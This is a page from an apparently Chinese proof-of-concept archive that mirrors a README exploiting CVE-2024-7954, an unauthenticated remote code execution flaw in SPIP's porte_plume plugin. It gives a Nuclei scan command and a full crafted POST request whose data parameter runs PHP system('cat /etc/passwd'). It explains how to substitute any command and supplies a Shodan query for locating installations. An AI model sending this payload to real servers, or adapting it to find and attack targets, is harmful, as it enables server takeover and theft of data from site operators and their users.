POC详情: c3334eff89c8c07ff85477d4211705e13ccdb214

来源
关联漏洞
标题: SPIP 安全漏洞 (CVE-2024-7954)
描述:SPIP是SPIP开源的一个用于创建 Internet 站点的免费软件。 SPIP存在安全漏洞,该漏洞源于容易受到任意代码执行漏洞的影响,远程未经身份验证的攻击者可以通过发送精心设计的HTTP请求以SPIP用户身份执行任意PHP。
介绍
# RCE-CVE-2024-7954

## Description

The **porte_plume** plugin, utilized by SPIP versions prior to **4.30-alpha2**, **4.2.13**, and **4.1.16**, is susceptible to a critical **arbitrary code execution (RCE)** vulnerability. This flaw allows a remote, unauthenticated attacker to execute arbitrary PHP code as the SPIP user by crafting a specific HTTP request. The potential for exploitation is severe, enabling attackers to run malicious commands on the server, which could lead to unauthorized access, data breaches, or further system compromise.

### Vulnerability Details
- **Affected Software:** SPIP (prior to versions 4.30-alpha2, 4.2.13, and 4.1.16)
- **Type of Vulnerability:** Remote Code Execution (RCE)
- **Severity Level:** Critical
- **Exploitability:** Remote and unauthenticated attackers can exploit this vulnerability.

## Exploit

##Nuclei Scan 

```
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml





```
An example of a crafted HTTP request that can be used to exploit this vulnerability is as follows:

```
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
```

### Explanation of the Exploit:
- The `POST` request is directed to the **porte_plume_previsu** action of SPIP's index.php file.
- The **data** parameter contains a payload that leverages PHP's `system()` function to execute a command (in this case, `cat /etc/passwd`), which reads the contents of the password file.
- By changing the command within the `system()` function, an attacker could execute any PHP code on the server, leading to severe consequences.

## Shodan Dork

To identify potentially vulnerable SPIP installations, the following Shodan search query can be used:

```
app="SPIP"
```

This vulnerability underscores the importance of keeping software up to date and implementing robust security measures to protect against exploitation.
文件快照

[4.0K] /data/pocs/c3334eff89c8c07ff85477d4211705e13ccdb214 └── [2.0K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。